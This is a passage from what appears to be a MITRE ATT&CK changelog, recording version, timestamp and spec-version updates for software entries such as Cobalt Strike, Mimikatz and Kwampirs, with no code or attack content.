x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0415] BOOSTWRITE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2019-10-15 17:07:57.638000+00:00 | 2024-04-11 02:48:51.475000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0574] BendyBear

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-21 15:02:21.066000+00:00 | 2024-04-11 02:54:10.246000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0268] Bisonal

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-18 17:18:36.512000+00:00 | 2024-04-11 02:53:35.918000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.0 | 2.1

[S0570] BitPaymer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-26 22:04:32.509000+00:00 | 2024-04-11 02:52:57.879000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0462] CARROTBAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 03:24:06.264000+00:00 | 2024-04-11 02:46:42.264000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0693] CaddyWiper

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-11 20:38:33.997000+00:00 | 2024-04-17 15:09:37.646000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0484] Carberp

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-08-25 20:08:29.545000+00:00 | 2024-04-11 02:47:56.829000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0348] Cardinal RAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 01:59:34.624000+00:00 | 2024-04-11 02:47:11.431000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0020] China Chopper

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-10 21:53:43.748000+00:00 | 2024-01-03 21:37:14.516000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.4 | 2.5

[S1041] Chinoxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-10 19:58:31.652000+00:00 | 2024-04-11 02:46:10.914000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0667] Chrommme

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-04 22:38:46.222000+00:00 | 2024-04-11 02:45:43.666000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0154] Cobalt Strike

Current version: 1.12

Version changed from: 1.11 → 1.12

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-09 16:47:36.538000+00:00 | 2024-04-17 22:05:58.343000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.11 | 1.12

[S0046] CozyCar

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-28 21:32:59.528000+00:00 | 2024-04-11 02:44:33.881000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0488] CrackMapExec

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-07-29 20:19:40.544000+00:00 | 2024-03-14 17:29:49.200000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1033] DCSrv

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 18:55:25.261000+00:00 | 2024-04-11 02:39:27.698000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1052] DEADEYE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-07 19:30:56.058000+00:00 | 2024-04-11 02:38:56.409000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0213] DOGCALL

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 15:27:25.149000+00:00 | 2024-04-11 02:37:34.915000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0497] Dacls

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-09-02 18:48:58.442000+00:00 | 2024-04-11 02:43:00.252000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1014] DanBot

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-01 14:11:46.207000+00:00 | 2024-04-11 02:42:34.540000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0673] DarkWatchman

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 03:34:53.944000+00:00 | 2024-04-11 02:40:18.361000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0081] Elise

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-20 23:20:16.933000+00:00 | 2024-04-11 02:35:48.740000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0082] Emissary

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-08-09 14:21:48.477000+00:00 | 2024-04-11 02:35:14.040000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0634] EnvyScout

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-16 01:24:29.056000+00:00 | 2024-04-11 02:34:42.912000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0401] Exaramel for Linux

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-14 22:43:50.451000+00:00 | 2024-04-11 02:34:14.304000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0267] FELIXROOT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:23:47.799000+00:00 | 2024-04-11 02:33:38.488000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2

[S0618] FIVEHANDS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-18 17:52:32.865000+00:00 | 2024-04-11 02:33:06.963000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0383] FlawedGrace

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2019-06-07 18:47:42.365000+00:00 | 2024-04-11 02:32:31.883000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0661] FoggyWeb

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-15 16:34:44.709000+00:00 | 2024-04-11 02:32:04.884000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1044] FunnyDream

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-11 12:33:19.525000+00:00 | 2024-04-11 02:30:25.854000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0410] Fysbis

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-01 16:58:20.224000+00:00 | 2024-04-11 02:29:45.766000+00:00
x_mitre_version | 1.3 | 1.4

[S0168] Gazer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-12-04 21:07:22.870000+00:00 | 2024-04-11 02:28:51.206000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0666] Gelsemium

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-26 19:02:24.792000+00:00 | 2024-04-11 02:28:01.735000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0588] GoldMax

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-30 16:31:52.140000+00:00 | 2024-04-11 02:26:45.606000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.2 | 2.3

[S0493] GoldenSpy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-08-19 16:31:40.508000+00:00 | 2024-04-11 02:27:23.911000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0531] Grandoreiro

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-26 19:05:29.235000+00:00 | 2024-04-11 02:25:51.549000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0237] GravityRAT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 20:44:34.524000+00:00 | 2024-04-11 02:25:20.119000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0342] GreyEnergy

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:44:35.685000+00:00 | 2024-04-11 02:24:46.255000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0391] HAWKBALL

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:46:39.617000+00:00 | 2024-04-11 02:23:13.352000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0232] HOMEFRY

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:47:38.393000+00:00 | 2024-04-11 02:18:12.743000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0376] HOPLIGHT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-28 20:24:33.471000+00:00 | 2024-02-09 19:24:50.164000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0170] Helminth

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-28 21:35:13.610000+00:00 | 2024-04-11 02:22:38.177000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0697] HermeticWiper

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 23:19:38.268000+00:00 | 2024-04-11 02:22:04.078000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0698] HermeticWizard

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-11 00:11:44.579000+00:00 | 2024-04-11 02:21:28.830000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1027] Heyoka Backdoor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 18:54:09.655000+00:00 | 2024-04-11 02:20:55.694000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0087] Hi-Zor

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-02-09 14:57:16.085000+00:00 | 2024-04-11 02:20:26.551000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0394] HiddenWasp

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-23 20:07:01.487000+00:00 | 2024-04-11 02:19:50.306000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0601] Hildegard

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-16 01:49:39.189000+00:00 | 2024-04-11 02:18:41.342000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0431] HotCroissant

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-05-06 19:28:21.746000+00:00 | 2024-04-11 02:17:38.807000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0398] HyperBro

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-11-29 21:48:51.029000+00:00 | 2024-04-11 02:16:42.727000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0483] IcedID

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-08-14 14:25:53.721000+00:00 | 2024-04-11 02:16:08.503000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0357] Impacket

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field | Old value | New value
modified | 2023-07-27 15:31:10.648000+00:00 | 2024-03-14 17:27:34.759000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.5 | 1.6

[S0581] IronNetInjector

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-20 17:02:59.587000+00:00 | 2024-04-11 02:14:36.791000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0044] JHUHUGIT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:51:56.323000+00:00 | 2024-04-11 01:49:50.568000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2

[S1051] KEYPLUG

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-12-12 15:47:46.797000+00:00 | 2024-04-11 01:46:20.169000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0526] KGH_SPY

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-22 13:42:18.822000+00:00 | 2024-04-11 01:45:40.875000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0356] KONNI

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-13 17:26:25.143000+00:00 | 2024-04-11 01:44:46.026000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.0 | 2.1

[S0487] Kessel

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-08-10 19:43:38.144000+00:00 | 2024-04-11 01:48:38.105000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1020] Kevin

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-08-31 16:38:11.028000+00:00 | 2024-04-17 22:07:06.736000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0387] KeyBoy

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_contributors | ['Bart Parys'] | 
values_changed
STIX Field | Old value | New value
modified | 2023-03-23 15:22:36.377000+00:00 | 2024-04-18 18:25:18.520000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0236] Kwampirs

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)

New Description
[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). [Kwampirs](https://attack.mitre.org/software/S0236) has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines.(Citation: Symantec Orangeworm April 2018) [Kwampirs](https://attack.mitre.org/software/S0236) has multiple technical overlaps with [Shamoon](https://attack.mitre.org/software/S0140) based on reverse engineering analysis.(Citation: Cylera Kwampirs 2022)

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-18 22:06:42.386000+00:00 | 2024-04-11 01:44:05.770000+00:00
description | (old description above) | (new description above)
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[S0349] LaZagne

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-03 18:35:09.021000+00:00 | 2024-04-04 03:49:27.035000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.5 | 1.6
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'GitHub LaZange Dec 2018', 'description': 'Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.', 'url': 'https://github.com/AlessandroZ/LaZagne'}

[S0395] LightNeuron

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 02:59:20.670000+00:00 | 2024-04-11 01:37:19.602000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0451] LoudMiner

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 04:51:42.922000+00:00 | 2024-04-11 01:36:42.906000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4

[S1060] Mafalda

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-04 21:05:06.549000+00:00 | 2024-04-11 00:49:47.226000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0530] Melcoz

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-12-22 21:20:18.142000+00:00 | 2024-03-29 18:12:59.212000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0455] Metamorfo

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 23:23:55.295000+00:00 | 2024-04-11 00:44:30.028000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.0 | 2.1

[S0339] Micropsia

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 17:03:01.353000+00:00 | 2024-04-11 00:43:46.245000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S1015] Milan

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-08-31 21:45:17.174000+00:00 | 2024-04-11 00:43:16.261000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0002] Mimikatz

Current version: 1.9

Version changed from: 1.8 → 1.9

Details
values_changed
STIX Field | Old value | New value
modified | 2023-07-27 15:33:07.594000+00:00 | 2024-02-09 21:31:30.227000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.8 | 1.9

[S0284] More_eggs

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-23 19:15:17.339000+00:00 | 2024-04-11 00:40:07.038000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 3.0 | 3.1

[S0256] Mosquito

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-26 19:19:33.603000+00:00 | 2024-04-11 00:38:26.326000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0228] NanHaiShu

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-06-23 20:05:03.169000+00:00 | 2024-04-11 00:37:11.186000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0039] Net

Current version: 2.6

Version changed from: 2.5 → 2.6

Details
values_changed
STIX Field | Old value | New value
modified | 2023-07-25 19:25:59.767000+00:00 | 2024-02-01 04:34:30.855000+00:00
external_references[2]['url'] | http://windowsitpro.com/windows/netexe-reference | https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.5 | 2.6

[S0352] OSX_OCEANLOTUS.D

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-12 20:21:08.235000+00:00 | 2024-04-11 00:28:52.310000+00:00
x_mitre_version | 3.0 | 3.1

[S0613] PS1

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-05 16:04:51.193000+00:00 | 2024-04-11 00:25:13.397000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S1050] PcShare

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-13 14:12:41.582000+00:00 | 2024-04-11 00:28:17.175000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0587] Penquin

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 04:12:29.037000+00:00 | 2024-04-11 00:27:30.199000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0501] PipeMon

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-26 19:38:46.705000+00:00 | 2024-04-11 00:26:37.214000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0012] PoisonIvy

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 22:03:44.669000+00:00 → 2024-02-14 19:16:01.583000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2

[S0113] Prikormka

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-19 01:42:59.312000+00:00 → 2024-04-11 00:25:44.638000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[S0029] PsExec

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-08-09 18:07:11.859000+00:00 → 2024-04-04 03:50:11+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6

[S1032] PyDCrypt

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-24 18:54:58.048000+00:00 → 2024-04-11 00:23:58.415000+00:00
x_mitre_attack_spec_version: 3.0.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0650] QakBot

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-05-01 17:05:20.902000+00:00 → 2023-12-05 20:22:37.368000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0662] RCSession

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
